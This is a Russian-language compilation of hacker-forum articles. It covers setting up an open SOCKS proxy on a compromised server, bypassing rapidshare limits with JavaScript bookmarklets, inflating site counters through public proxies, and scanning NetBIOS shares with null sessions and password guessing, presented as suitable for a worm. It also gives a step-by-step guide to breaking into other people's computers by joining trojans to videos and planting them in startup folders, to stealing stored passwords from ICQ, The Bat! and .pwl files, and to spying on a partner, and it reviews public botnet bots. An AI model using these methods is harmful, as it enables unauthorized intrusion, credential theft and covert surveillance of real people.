Что такое шелл и как с ним работать я тоже не буду объяснять, не об этом моя статья. 3proxy можно скачать с офсайта www.security.nnov.ru/soft/3proxy . Шелл выбирать тебе, либо это будет похаканный тобой серв, либо шелл на платном хостинге. Почему на платном? Да потому что ни один бесплатный хостер не позволит тебе установить проксик, проверял сам лично (хотя если найдшь такое чудо, незабудь поделиться со мной ) Надеюсь о том как забидить шелл на уязвимой тачке рассказывать не нужно (но всё таки если у тебя с этим проблемы, пиши, накатаю продолжение %).
Итак, ты на шелле. Качай архивчик с 3proxy и приступим к процессу установки (для танкистов поясняю, скачать можно любым даунлоадером установленным на серве, если же даунлоадера ты не нашел, заливай через FTP).
Как я уже говорил закачку файла можно произвести командой wget http://site.ru/file.tar.gz . Но иногда можно столкнуться с отсутствием утилиты wget на сервере. Но это не проблема, т.к. помимо wget существуют другие консольные даунлоадеры, например curl и fetch. Работют с ними по тому же принципу что и с wget, например ты нашел на серве curl, командуй: curl http://site.ru/file.tar.gz .
А что делать если на серванте вообще нет даунлоадера !? К сожалению бывает и такое. Но вы ход есть всегда . Ведь если у тебя есть шелл, ты можешь залить файлы на него через FTP. Вот как это реализовать:
Вообще если ты занимаешься сетевым взломом, то у тебя наверняка есть свой склад сплойтов и прочего жобра на каком либо хостинге. Если же ты до сих пор не зарегистрировал аккаунт на бесплатном хостинге, беги регистрировать, например на www.newmail.ru, имхо на этом хостинге нет антивирей и для хранения эксплойто и другой лабуды он подходит лучше всего.
Итак ты зарегистрировал свой аккаунт на newmail.ru, тебе дали ящик и место под сайт в придачю. Заливай на свой свежезареганный сайт 3proxy. Теперь собственно приведу пример того, как закачать на шелл нужный нам сайт через FTP (всё что после # это мои пояснения, их писать не нужно %):

Код
1
2
3
4
5
6
7
echo open ftp.newmail.ru 21>mpg      #  соеденяемся с FTP-сервом
echo yoursite.nm.ru>>mpg        #  здесь адрес твоего сайта
echo password>>mpg                      #  пароль к твоему аккаунту
echo bin>>mpg            #  заходим на сайт (чёта такое, точно незнаю %)  
echo get 3proxy.tar.gz >>mpg          #  сливаем с сайта архивчик с 3proxy                  
echo bye>>mpg                                  #  закрываем соединение
ftp -s:mpg


Итак скачаллось, теперь разархивируй архив. В папке с разархивированным проксиком скомандуй make –f Makefile.unix и жди пока процесс компиляции модулей завершится. Если ты всё сделаешь правильно (и если нормальный шелл), то появится один бинарник с названием 3proxy. Всё. Ты собрал свой проксик, теперь его нужно отконфигурировать. Создаём в той же папке где и бинарник 3proxy файл 3proxy.cfg .
Создал? Молодец, теперь вбиваем настройки, их немного.
Пиши в файле конфига следующее (всё что после # в конфиг добавлять ненужно, это мои коментарии %) :

Код
1
2
3
4
5
6
nserver 127.0.0.1      #  адрес DNS для автоматического соединения
auth none                      #  отключаем авторизацию =))
allow *                          #  рашзрешение на использование проксика с любого адреса.
socks –p7855                  #  номер порта нашего сокса.
internal 127.0.0.1              #  внутренний IP
log /dev/null                    #  сюда будут записываться логи. Не волнуйся, сюда можно только записывать инфу, прочесть её невозможно.


Если ты всё набрал, нажми ctrl+c , конфиг запишется в ту директория в которой ты его создавал.
Вот впринципе и всё по установке. Чтобы запустить собранный сокс скомандуй ./3proxy 3proxy.cfg .

Рассмотрим пример конфига, в котором мы установим авторизацию на нашем соксе:

Код
1
2
3
4
5
6
7
nserver 127.0.0.1    # адрес DNS для автоматического
users nick:CL:pass   # создаём юзера с ником nick и паролем pass 8)
auth strong              # указываем необходимость авторизации !
allow *       # рашзрешение на использование проксика с любого адреса.
socks –p7855         # номер порта нашего сокса.
internal 127.0.0.1    # внутренний IP
log /dev/null           # сюда будут записываться логи. Не волнуйся сюда можно только записывать инфу, прочесть её невозможно


В конфиге воявляется новая строчка users nick:CL:pass , этой строкой ты создаёшь юзера (nick и pass конечно нужно поменять на свои %). Юзеров можно создать несколько, делается это одинаково. И незабудь изменить строчку auth none на auth strong!


Всё, ты собрал полноценный socks для личного пользования



Обход ограничений на rapidshare.de


Как скачать с rapidshare.de или Обход ограничений сервиса rapidshare.de
Всем знаком сервис rapidshare.de ну или почти всем. Решил поведать вам несколько секретов обхода ограничений этого сервиса.
На этом сервере есть два ограничения:
1. Нужно ждать от 30 до 150 секунд до появления ссылки на закачку
2. С одного IP можно качать одновременно только 1 файл
Предлагаю 4 чита для этого сервиса!

1) Обход лимита на скачивание за час.
Создайте bat-файл со следующим содержимым:

Код:

@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
exit

Всё что нужно - удалить все свои куки, запустить этот bat-файл и после этого идти по нужной ссылке в RapidShare.
(Этот метод я не пробовал, но весьма вероятен успешный исход)

2) Обход таймера(40-80 сек.) для немедленного получения ссылки на скачивание.
После нажатия кнопки Free, счетчик начинает обратный отсчет секунд, введите в адресной строке браузера вот это:

Коды (2):

javascript: function nl() { for (var i=97; i<=122; i++) { c="count"+String.fromCharCode(i); try { eval©; eval(c+"=0; f"+c+"()"); break; } catch(e) {}; };} nl();

javascript:/vars*(.*?)s*=/i.test(document.body.innerHTML);for(i=0;i<50;i++) eval("f"+RegExp.$1+"()");

Нажмите Enter - О, ЧУДО! Ссылка появляется моментально!
(Проверено, работает 100%)
Для удобства можно занести в закладки браузера

3) Закачка больших файлов.
RapidShare не позволяет закачивать на сервер файлы больше чем 30000000 байт.
А если Вы закачаете мультитомные архивы (*.part1.rar и т.д.), рано или поздно эти файлы
будут удалены(Вне зависимости от имён файлов).
Обходится это так: создаёте как обычно мультитомный архив и ещё раз запаковываете каждую его часть
в отдельный файл(rar или zip - не важно). И уже эти файлы загружаете на RapidShare.

4) Загрузка файлов на RapidShare с анонимного IP (чтобы вашего IP не было в ихних логах)
Идите по этой ссылке: http://www.space.net.au/~thomas/quickbrowse.htmlи лезьте в RapidShare через какой-нибудь сервис(можно через 1-ый или 2-ой).
Для этого просто введите в нужном поле http://rapidshare.de и нажимайте Go.
И вообще эти сервисы можно использовать для "анонимного сёрфинга" по всему интернету! Вот толко на некоторых сайтах некоторые отказываются работать, но на то Вам и предоставлен выбор!
Пробуем и комментируем
Удачи....

Отредактировал JIuBeHb


Накрутка счётчика Mail.ru как месть


"Накрутка" счетчика - вид мошенничества, цель которого состоит в неправомерном завладении мошенником денежными средствами рекламодателя путем введения последнего в заблуждение относительно реальной посещаемости ресурса, использующее доверие к рейтинговым системам.

Вот только после этого и более чем через сутки ответили. Но как!!! Мое терпение не безгранично. Я попытался объяснить молодым людям, что:

во первых - крайне невежливо запрещать отсылку квитка о получении корреспонденции и

во вторых - надо иметь неопровержимые доказательства использования ресурсом "накрутки", прежде чем объявлять об этом на весь мир.

Обвинение лица в мошенничестве (см. определение "накрутки") без достаточных на то оснований в средстве массовой информации (у Mail.Ru должна быть лицензия), может быть расценено лицом, как распространение средством массовой информации ложных сведений (измышлений) о лице с целью нанесения лицу публичного оскорбления. Со всеми вытекающими последствиями.

Сначала я попросил представить мне доказательства мошенничества с моей стороны. Ответ был очень неубедительный - "я так считаю" и "поставьте java-счетчик". В надежде, что это все-таки ошибка, я довел до сведения корреспондента свою трактовку кривой посещаемости и попросил выслать мне код счетчика. Ответ был тот же - "я так считаю" и никакого счетчика. Тогда я иду дальше и рассказываю, как, пользуясь статистикой Mail.ru, выявлять "странные" ресурсы, которые в широком ассортименте представлены в рейтингах. Опять безрезультатно. Тогда я звоню по телефону ***-**** и в телефонном разговоре мне нагло заявляют - ресурс бесплатный, что хотим, то и делаем. Только тогда я понял, что это не глупость и не ошибка, а целенаправленное вымогательство денег (мол, счетчик бесплатный, но заплати - и никаких проблем), замаскированное "рейтингистами" Mail.ru под мелкое хулиганство.

И тогда я решил их наказать. "Ломать" Mail.Ru - это не ново, да и уголовщиной попахивает. Обращаться в Суд - долгая история, жалко свои нервы, тем более, что принять деньги от вымогателей в качестве компенсации морального вреда лично я побрезгую. Я решил сохранить свои нервы и одновременно в корне пресечь деятельность "рейтингистов" Mail.Ru, сделав работу этой "команды" бессмысленной. Для этого мне надо было просто хорошо изложить и опубликовать мои изыски по "накрутке" счетчиков, связав публикацию с Mail.ru. Видит Бог, я не хотел это публиковать.

Немного истории

В апреле 2001 года я пришел в Проект. Мне поставили задачу вывести Проект на верхние строки рейтингов (желательно с большим отрывом), т.е., необходимо было добиться посещаемости порядка 10-15 тысяч человек в день (50-100 тысяч показов страниц в день). Я считаю идею Проекта очень перспективной и жизнеспособной и считаю, что хорошей идее нужен правильный механизм реализации, как алмазу нужна огранка, чтобы он засверкал всеми цветами радуги. Этим я и занялся.

К июню инвесторы Проекта посчитали, что их затраты не дают должной отдачи, но у меня уже был готов план реорганизации ресурса. Я его изложил было принято решение о переводе проекта в стадию реорганизации на срок до года с продолжением финансирования минимально необходимых для реорганизации работ и персонала.

Для начала я изучил работу всех основных "поисковиков" и реорганизовал в соответствии с их требованиями представление информации, добившись почти максимальной релевантности для ключевых слов на страницах. Однако остались "хвосты", заложенные первыми разработчиками. Например, в Expires было указано, что страницы не будут меняться две тысячи лет. Естественно, что большинство роботов-поисковиков до сих пор не перечитали страницы проекта, хотя в настоящее время выложена уже третья версия Проекта и вот-вот появится четвертая.

Несмотря на то, что Internet - инерционная система, резкие скачки посещаемости ресурсов вполне допустимы и свидетельствуют о качественных изменениях (переходных процессах) в поведении ресурсов. С 10 октября 2001 года и по 5 марта 2002 года Проект непрерывно и плавно набрал посещаемость до 500 человек в сутки благодаря одному Yandex.ru. Остальные роботы-поисковики молча смотрели на "памятник", который "воздвигли" себе на Expires первые разработчики.

И вот ночью 5 марта, ровно через год после регистрации ресурса на Rambler.ru, их робот наконец-то перечитал ресурс и сразу же дал резкий скачок посещаемости. Эффект сравним с эффектом от регистрации ранее "раскрученного" ресурса (что и было однажды мной зафиксировано). Как Rambler.ru и обещали, что они "покрывают" порядка 65% RuNet-а, так и оказалось на самом деле. Я никогда не верю саморекламе вроде "Пресса о нас" или "А вот мы какие хорошие", но тут я должен отдать должное - Rambler.ru можно верить.

Поскольку ресурс находился в отладочном режиме, то в конфигурации Apache стояло MaxRequеstsPerChild=1. Из-за этого ограничения в кривой посещаемости появился горизонтальный "стол". До 5-го мая я занимался исследованием соответствия пропускной способности канала и производительности сервера. Когда же я убедился, что все нормально, то сделал MaxRequеstsPerChild=0. Так появился второй скачок.

Любой культурный человек, знакомый с теорией и имеющий опыт обработки результатов экспериментов, если бы не смог сам понять "странности" характера кривой посещаемости, попросил бы автора объяснить эти "странности", и только потом, взвесив все "pro" и "contra", обвинял бы в мошенничестве в средстве массовой информации. Так не было сделано и теперь уже я делаю вывод, что персонал "рейтингистов" Mail.ru не обладает достаточной этической, правовой, научной и технической культурой, следовательно - этот невежи и невежды. Сразу же становится объяснимой попытка вымогательства, ибо, чем выше культурный уровень человека, тем сложнее ему покуситься на преступление, и наоборот, чем ниже - тем проще. В приличном обществе невежам обычно указывают на дверь.

DURA LEX SED LEX

Я хочу заранее предвосхитить любые попытки обвинить меня в занятии "грязными" делами. Я не занимаюсь "грязными" делами, не нарушаю не только Законы, но и свято следую нормам этики. И этого же требую от других. И как у культурного человека, у меня очень высокий порог, который надо переступить для совершения преступления. Мне проще найти решение сложной задачи, ибо уровень моего интеллекта позволяет это делать. И я ловлю кайф от решенных мною задач на грани возможного. Я всегда восхищаюсь любой хорошо сделанной работой. Это не самореклама. Хорошо знающие меня люди подтвердят мои слова.

Чтобы не сталкиваться в будущем с неожиданностями, я предварительно рассмотрел практически все аспекты проблемы, которой занялся и наметил возможные пути реализации поставленной задачи. В том числе я рассмотрел возможные механизмы "накрутки" счетчиков. Не скрою, я рассматривал "накрутку" как возможное, но крайнее средство, которое могло бы помочь ресурсу подняться в рейтингах до уровня, когда начинается "самораскрутка", а затем постепенно вывести ее "в ноль".

Для начала надо было выяснить что такое "накрутка". Отвечая на этот вопрос, я пришел к той формулировке понятия "накрутка", которую поместил в начало статьи. Оставалось определиться с правовыми последствиями применения "накрутки". Законченный состав преступления (мошенничества) был бы налицо, если бы реальному рекламодателю был бы нанесен материальный ущерб, т.е. был бы налицо реальный объект преступных посягательств.

Если материальный ущерб отсутствует, то "накрутку" (в случае, если "схватят за руку") можно трактовать, как неудачный эксперимент, цель которого могла быть любая, от выяснения порога "самораскрутки", до влияния глубины Марианской впадины на урожайность апельсинов на Аляске. Важно отсутствие еще одной составляющей законченного состава преступления - субъективной стороны: "никакого преступления не готовил и не совершал и даже в мыслях не держал, а лишь проводил научный эксперимент, результаты которого хотел положить в основу статьи (диссертации)".

Итак, если во время использования "накрутки" ресурса не заключаются финансовые договора с рекламодателями и от них не получаются денежные средства, то отсутствуют объект преступных посягательств и субъективная сторона преступления. Об этической стороне говорить не приходится, и так все ясно. Радует уже одно то, что уголовного преследования удается избежать.

Однако если удается избежать уголовного преследования, то стоит подумать и о том, что делать, когда "схватят за руку". Ответ до удивления прост - надо просто потребовать доказательства. Наш Российский законодатель самый законодательный законодатель в мире, равно как наши поезда самые поездатые поезда в мире. Законодатель заранее побеспокоился о том, чтобы даже log-файлы, не говоря уже о результатах каких-то расчетов, доказывающих "накрутку", нельзя было рассматривать в качестве документального доказательства.

Я не буду рассматривать все тонкости действующего ныне определения понятия "документ", отмечу только, что согласно этому определению банковские операции незаконны, ибо кассир, а тем более вкладчик не являются должностными лицами и понятие "финансовый документ" является частным случаем общего понятия "документ". И вместо лица может расписаться любой человек, но заверенная должностным лицом эта подпись становится (в соответствии с Законом!!!) документом, изобличающим лицо. Какая прекрасная возможность для аферистов!!!

В 1993 году по просьбе прокурора Сахалинской области я написал рецензию на проект закона "Об информации, информатизации и защите информации". Проект был исключительно плох, поэтому для кардинального улучшения смысла Закона я предложил сделать всего две вещи. А именно, в начале текста Закона дать основные определения понятий "документ", "документированная информация", "копия документа", "несанкционированный доступ", "стоимость информации" и др. и убрать приоритетность государственной поддержки процесса информатизации, для исключения возможного использования этого положения с целью совершения противоправных деяний. Тогда я мог только предполагать, а теперь мы все знаем, в какие потери для Государства вылились и сколько крови пролили налоговые льготы для благотворительных организаций и фондов.

Сравнение текстов проекта, рецензии и окончательного варианта Закона дает мне уверенность в том, что моя рецензия была использована законодателями при подготовке окончательного варианта текста Закона. Но Боже мой, во что превратилось данное мной определение понятия "документ"!!! Я давал следующее интуитивно правильное определение: документ - носитель информации (объект материального мира), путем изменения физических, химических, механических или иных материальных свойств которого на нем закодирована информация методом кодирования, позволяющим дать однозначный ответ на вопрос изменялась или нет информация на этом носителе в течении заранее обусловленного времени. В тексте Закона "Об информации…" дается еще одно определение: "информация - сведения…", т.е. "масло - масляное". Несколько лет спустя, в разделе "Законы" на сайте www.HackZona.Ru в статье я дал обоснование и привел интуитивно правильное определение объективного (в отличии от действующего
ныне субъективного) понятия "информация". Жаль, что эта статья теперь недоступна.

Если до появления определения понятия "документ" в Российской (и Советской) юриспруденции использовались определения из Толкового Словаря Русского Языка Ожегова или из Большой Советской Энциклопедии, то теперь следует использовать определение из текста Закона "Об информации, информатизации и защите информации". Этого требует принцип приоритета законов. В последнее время я перестал отслеживать "глюки" в Российском законодательстве - неблагодарное это занятие, ибо что ни Закон, то "глюк" сидит на "глюке" и "глюком" погоняет, а выискивать логически безупречные Законы в общей массе, это тоже, что искать жемчужное зерно в куче навоза. Можно ведь и не найти, а в навозе испачкаешься.

Учитывая нюансы действующего ныне юридического понятия "документ", я не стал обращаться в Суд. Тем более, что через десять дней Mail.ru убрали порочащие меня сведения, а доказать не только попытку вымогательства в телефонном разговоре, но и то что такие сведения реально существовали (даже при наличии у меня твердой копии страницы) практически невозможно. "Рейтингисты" Mail.ru легко могли вычистить на своих компьютерах log-файлы и заявить, что эту страницу я просто подделал, т.е. свалить все с больной головы на здоровую.

Однако вернемся к "накрутке". Остался нерешенным вопрос о том, какая из рейтинговых систем реально может "поймать за руку" при "накрутке". Для выяснения этого вопроса я написал небольшой perl-скрипт для чтения заранее указанных страниц и всех ссылок первого уровня через публичные proxy-сервера, список которых регулярно публикуется на Yahoo.com. Сразу оговорюсь, что это была разовая акция, которая легко отслеживается, и целью которой было не получение материальных благ, а лишь выяснение качества работы различных рейтинговых систем. Надеюсь, что мне не будут ставить в вину этот небольшой эксперимент. Итак, Rambler.ru и SpyLog.ru "на лету" отбросили негодные адреса, однако рейтинговая система List.ru (теперь Mail.ru) восприняла эти адреса за чистую монету и посещаемость (по их статистике) выросла в тот день в два раза. Тогда я впервые столкнулся с непрофессионализмом этой "команды".


Сканирование shared (расшаренных) - ресурсов в inernet

Первая стадия - сбор данных.
# Послать запрос ping. Если нет ответа, то пропустить этот адрес (и не атаковать эту машину на второй стадии).
# Определить имя DNS (на всякий случай, оно нигде не используется)
# Попробовать установить null session(1).
# Попробовать получить список shared resources.
# Если null session установить не удалось, то закончить первую стадию для этого адреса.
# Попробовать получить список имен пользователей.
# Попробовать получить информацию об операционной системе, а именно

        * Платформу (Windows 9x, Windows NT)
        * Версию LAN Manager (Для NT: 4.00 => NT4, 5.00 => Windows 2000)
        * Роль системы в сети: флаги Master Browser, Backup Browser, PDC, BDC, RAS dialin server.

Вторая стадия  - подбор паролей. Все имена пользователей, полученные на первой стадии, объединяются в один список, что позволяет учесть доменную архитектуру систем на базе Windows NT. На этой стадии проверяются соединения типа net use 1.2.3.4IPC$ password /user:username. Если соединение успешно, то проверяются все возможность подключения ко всем shared resources, и, когда подключение успешно, возможность записи.
# Проверить подключение со случайным именем (используется результат GetTickCount() в десятичном представлении) и пустым паролем. Если подключение успешно, то считать, что разрешено подключение Guest, и дальнейшие проверки паролей будут бессмысленны(2). Проверить shared resources и больше не подбирать пароли на эту машину.
# Проверить подключения со всеми именами, собранными на первой стадии. Проверяется пустой пароль и пароль, совпадающий с именем пользователя. Если подключение успешно, то проверить shared resources.


(1) Null session - анонимное соединение (с пустым именем и паролем). То же, что и net use 1.2.3.4IPC$ "" /user:""
(2) Это не совсем верно. Правильным вариантом было бы все равно проверять все имена, и каждый раз отслеживать изменения прав доступа к shared resources.

Защита
Атака может быть предотвращена следующими методами:

    * отключением NetBIOS over TCP/IP
    * запретом доступа к портам 135 и 139 при помощи firewall
    * запретом анонимного доступа к системе путем установки в 1 значения ключа HKLMSystemCurrentControlSetControlLsaRestrictAnonymous
    * выбором устойчивых паролей
    * запретом пользователя Guest или введением для него login station restrictions
    * специальными программными средствами

Введение account lockout смысла, скорее всего, не имеет, поскольку проводятся всего две попытки угадать пароль.

Стандартное протоколирование доступа методами NT не позволяет установить IP атакующего (только NetBIOS имя машины и домен, которые могут быть произвольно изменены). Однако протокол позволяет идентифицировать прошедшую атаку: сначала идет одна запись об успешном входе в систему пользователя ANONYMOUS, а потом (после паузы около минуты) серия записей о неуспешных попытках входа с разными именами пользователей (в том числе и тех, которых нет на этой машине; по две записи на имя). Если среди них есть хотя бы одна запись об успешном входе, систему следует считать скомпрометированной.

Реализация
Для проверки метода была написана программа, реализующая вышеописанный алгоритм (это заняло около 6 часов вместе с тестированием и перерывами на покурить). Тестовые сканирования проводились на Dual Celeron 400MHz 96Mb RAM с одновременным запуском до 128 потоков.

Статистика
Был проведен ряд экспериментальных сканирований. В качестве источника адресов подсетей был использован Intruders list, полученный при помощи BlackICE, однако разработка алгорима быстрого определения "населенных"  подсетей не представляет никакой сложности. Сканирование 254 адресов занимает от двух до десяти минут в зависимости от качества связи и общего количества имен пользователей в сети.

Кратко сформулированный результат такой:

    * примерно 10% паролей пользователей Windows может быть угадано с двух попыток
    * примерно 40% Windows-машин, доступных по NetBIOS over TCP/IP, выставляют ресурсы в общее пользование без (достаточной) защиты
    * примерно каждая третья share, доступная из Internet, разрешает запись

Кроме того: за два часа не очень напряженной работы можно найти три машины с Windows NT, к которым можно подключиться по сети с правами администратора (CONNECT: Administrator : <NO PASSWORD> :).

Детальная статистика:
Всего адресов просканировано: 1524 - 100%
На ping ответило: 442 - 29%
Null session установлено с: 102 - 6.7%
Guest разрешен(1): 57 - 3.7%
Уязвимых машин(2): 45 - 3.0%


(1) Т.е. возможно подключение к IPC$ со случайным именем
(2) Уязвимыми считались все машины, которые позволяли подключить разделяемый ресурс хотя бы на чтение.

Распределение платформ

Всего успешных запросов: 102 - 100%
Windows 95/98: 58 - 57%
Windows NT или SAMBA: 44 - 43%

Пользователи

Всего имен проверено: 177 - 100%
С пустым паролем: 10 - 6%
С паролем, совпадающим с именем: 10 - 6%

Shared resources

Всего директорий: 278 - 100%
Доступно на чтение: 171 - 62%
Доступно на запись: 91 - 33%


Перспективы применения
Во-первых, эта атака (после незначительного усовершенствования) может быть использована для быстрого заселения обширных территорий, например, BackOrifice или программами для проведения DDoS-атак.

Во-вторых, на этом алгоритме может быть реализован сетевой червь, даже заниженная оценка скорости распространения которого производит тяжелое впечатление


Проверка паролей на слабость
Предположим, у нас есть пароль pass12345woRd_. В чем заключается его сила? Смотри внимательно: длина пароля больше пяти символов, в пароле присутствуют буквы разных регистров и цифры, также присутствуют спецсимволы. Слабое место такого пароля это только то, что удалив все цифры и спецсимволы, а также переведя все оставшиеся символы в один регистр мы получаем словарное слово - password. Отсюда следует, что наша программа проверки паролей должна оставлять только символы английского алфавита и перевести все в нужный регистр, а затем искать это слово в словаре.

Но ведь может встретиться и такой вариант нашего пароля p4ssw0Rd_. И только что рассмотренный алгоритм действий не подходит. Можно заменять цифры на похожие буквы или наоборот, но тогда пароль типа p4assw0oRd_ не будет распознан. Поэтому можно усилить имеющийся алгоритм одним условием: знаки 1,i,l,2,z,3,e,4,a,5,s,6,d,7,8,b,9,g,0,o,+,t будут вырезаться. Конечно, вместе с этим не пройдут проверку множество сравнительно надежных паролей. А вот пароль password после обработки будет выглядеть как pwr. Кстати, пароли power и powered так же будут выглядеть после такой обработки. Т.о. словарь для перебора значительно "похудеет", что не может не радовать.

В дальнейшем мы будем заменять несколько идущих подряд согласных одним согласным. Теперь пора вспомнить про фонетические замены и пароль thanx - фонетический двойник пароля thanks. Если вы следите за повествованием, то должны заметить, что знак "s" мы уже вырезали, как и знак "a". Т.е. вполне логично заменять x=k. А несколько идущих подряд одинаковых символов (групп символов) лучше заменить на один такой символ (группу символов). Это очень сильно поможет в борьбе с "особенно сообразительными" пользователями, которым лень запоминать длинные последовательности символов. Например, hnnnnnn меняем на hn.

Если еще немного подумать, то можно найти гораздо больше шаблонов для замены и преобразований. Но, скажем, для контроля безопасности паролей сотрудников, этот подход будет эффективным. Конкретную реализацию этого подхода я не создал, да и вряд ли буду браться за это. Просто у меня возникла эта довольно интересная идея, которой я и решил поделиться


Как взломать чужие компы
1. Общее:

Многие, насмотревшись фильмов про "хакеров", где половина вымысла имеют искаженное представление про взломы удаленных компьютеров. Скажу сразу, что не каждый камп можно ломануть. Хотя, может я чего не знаю. Вообще проникновения происходит через IP удаленного компьютера. Самый легкий способ проникновения на компьютер это через Shared Resources или в простонародье "шары". Конечно, достойное место занимает и соц. инженерия в этих вопросах, но это уже в случаях проникновения в камп своих знакомых. Вообще мне известны два способа проникновения в чужой камп. Первый это как я уже говорил через шары и второй через трояна. Соц. инженерию я думаю, что ее не стоит отмечать как еще один способ, она, на мой взгляд, входит в те два пункта.

2. Подготовка перед проникновением:

Много людей не могли осуществить свои действия из - за одной не большой штучки под названием NetBIOS. Не буду вдаваться в подробности, что это такое, так как на этот вопрос Вы сможете найти ответ на поисковиках Яндекс, Рамблер и им подобным. Сейчас расскажу, как включить эту бяку:

В win95,win98, winMe

По умолчанию в этих системах включена поддержка этого протокола, единственное, за чем Вам необходимо проследить - так это за тем, чтобы не был включен "Общий доступ к файлам и принтерам". Для этого достаточно нажать одноименную кнопку в диалоге "Сеть" на "Панели управления" и снять там все флажки.

В WinNT (NT/2000)

Ищите в свойствах подключения, флажок NetBIOS вполне очевидно говорит о том, что его нужно включить. И опять же, отключите общий доступ к Вашим дискам и принтерам.

В WinХР

Что касается WinXP, то в ней, помимо того, что поддержка протокола отключена ввиду её устаревания, установлен также внутренний брандмауэр, что, безусловно, благоприятно сказывается на защищенности Вашей системы и означает, что общий доступ к ресурсам закрыт. Чтобы включить поддержку NetBIOS, достаточно в свойствах Вашего соединения с Интернетом зайти на вкладку "Сеть" и открыть свойства "Протокола Интернета TCP/IP". Здесь, щелкнув кнопку "Дополнительно" и перейдя на вкладку "Wins", включите переключатель Параметры NetBIOS в положение "Включить NetBIOS через TCP/IP".

3. Взлом компьютера через Shared Resource:

1.1 Какой Ip диапазон сканировать?

Да задают мне такой вопрос частенько: Так вот это все зависит от такого, что Вы хотите иметь после проникновения на чужой камп. Если просто различную информацию (пароль на почту, Icq или другие документы), то в принципе можно вообще наугад сканировать Ip диапазон, не забываете, что максимальный Ip 255.255.255.255.

Другое дело если Вам понадобились пароли на Интернет. В этом случае нужно сканировать Ip диапазон своего провайдера. То есть вы просто должны узнать свой Ip и поставить его как диапазон. Например, Ваш Ip 123.2.34.14, следовательно, диапазон будит от 123.2.34.1 до 123.2.34.255. Свой Ip можно узнать следующим образом, Пуск >Выполнить и впишите winipcfg, должна выскочить маленькая табличка, думаю сами найдете что Вам надо.

1.2 Сканируем диапазон:

Вот опять стоит дилемма, чем сканировать? И опять ответ: Смотря, для каких целей! Думаю, придется сделать под пунктик.

3.2.1 Получение кешированых паролей (пароли на Интернет):

В этом случае я пользуюсь сканером Shared Resource Scanner 6.2. Он очень удобен и быстр. Он нужен, что бы стащить файлы с расширением pwl, которые храниться в корневой папке windows'а и несут в себе пароли к Интернету, но опять же есть и пустые файлы. Расшифровать эти файлы можно с помощью программы PwlTool 6.5 или HackPwl.

3.2.2 Получения информации (документы, файлы):

Для этого мне удобней использовать сканер, который подключает локальные диски удаленного кампа к Вашим как сетевые, то есть эта программа xShareZ. И уже будет проще искать то, что Вам нужно.
Еще можно не подключать, как сетевой диск, а просто в браузере написать \123.123.123.11 (Ip взят наугад).

1.3 На шарах стоит пароль:

Да, раньше это вызывало у меня большие трудности, после нескольких попыток я бросал тот камп и переходил к другому, но потом узнал, что существуют программы, которые подбирают пароль за считанные секунды, программа называется xIntruder или есть еще SPY.

4. Взлом компьютера через трояна и пример соц. инженерии:

1.4 Какими Троянами пользоваться:

Нужны Трояны так называемые для удаленного администрирования. Например, такие монстры как ALB и LD
Все что Вам нужно так это запустить сервер на удаленной машине. Это делается следующими способами:

4.1.1 Через шары. Если Вы залезли к кому ни будь на расширенные ресурсы, то что бы потом опять не сканить диапазон и так далее просто закачайте сервак по этому пути (предварительно настроев его работу) C:\Windows\Главное меню\Программы\Автозагрузка. После перезагрузки камп автоматически запустит трояна!

4.1.2 Это так называемое "впаривание" или по - другому соц. инженерия. Допустим, решили Вы над другом прикольнутся, или последить с кем ваша девушка общается, переписывается и так далее. Для этого качаем эту программу Joiner v2.1 и склеиваете сервер трояна ну с Масяней например и прейди к другу домой со словами "Во! Новая серия приколов куча!" и запускаете Масяню вместе с трояном! А если другу понравиться так он еще и своим друзьям даст твоего троя, сам того не зная! Вот ты приходишь домой и звонишь ему и говоришь "Заходи в интернет, в чате посидим!". Друг заходит в инет и его камп у Вас в полно распоряжении:

Если подумать, то можно много разобрать подобных ситуаций, что бы "впарить" Вашего коня.

5. Что можно заиметь от проникновения:

Я думаю всем и так все понятно, но мало ли что. Например, часто бывает, что, бродя по просторам Интернета, Вы для удобства помещаете на рабочий стол файл, где хранятся все Ваши пароли к сайтам почте и так далее. Вот и не Вы один. Значит, заходим по такому пути C:\windows\Рабочий стол\ копируйте все файлы с расширением .txt.

Можно стащить номер аськи (Uin Icq) для этого идем сюда C:\Program Files\ICQ\icq(версия)\качайте файл с расширением .dat, а потом при помощи программы ICQr Information узнаете пароль и все такое прочее.
Замечательный почтовый клиент The Bat! позволяет подсмотреть полный данные о почтовом аккаунте, если подсунуть ей чужой профиль и с помощью программы Open Pass посмотреть закрытый звездочками пароль, остальное она прочитает и расскажет сама. Кроме перечисленных, существует огромное количество сохраняющих пароли прог, это - самые массовые.

Ну думаю первым делом это конечно пароли на Интернет. Как я говорил, они хранятся в файлах с расширением .pwl (password windows list) по этому пути C:\Windows\*.pwl. Но не все делают папку с виндой именно так, есть много разных способов ее названия от Win98 до Vasina, если Вы сталкнулись с такой проблемой то попробуйте использовать поиск файлов, где нужно указать искомые фыйлы таким образом *.pwl
* - неизвестное имя файла
.pwl - расшерения файла, т.е. все фалы с этим расшерением будут искаться.
Единственное поиск очень сильно тормозит и им следует пользоваться только в крайнем случае!

Думаю, если хорошо поищите, то много чего еще можно накопать.


Свой ботнет это просто!
Большинство ботов используют так называемую "stealth" технологию, которая позволяет трояну быть полностью невидимым в системе и юзер даже не будет подозревать что в его системе находиться троян. Некоторые боты-черви используют технологию самораспространения, благодаря нашумевшим дырам в винде, например брешь в службе RPC, боты способны сами распространяться по сети, заражая ежедневно тысячи компьютеров, обычно такие боты пишутся под заказ и стоят много денег. Но не все так плохо как кажется на первый взгляд. Существует множество "public" ботов которые может скачать любой желающий и создать свою бот-сеть. Вот обзор самых популярных паблик-ботов:

AgoBot - Пожалуй самый известный/лучший/с большими возможностями, такими как: DoS/Граббинг паролей/Стелс/Обход фаерволлов и множество других возможностей. К сожалению автор этого бота сейчас сидит в тюрьме, но исходники его творения ушли в сеть, и в данный момент насчитывается около 100(!!) модификация этого бота.

PhatBot - Нашумевшая модификация AgoBot'a с кучей возможностей, отличительная черта: самораспространение через баги в RPC, LSASS и т.п.

Rx-Bot - Достаточно новый бот, не уступающий возможностям AgoBot.

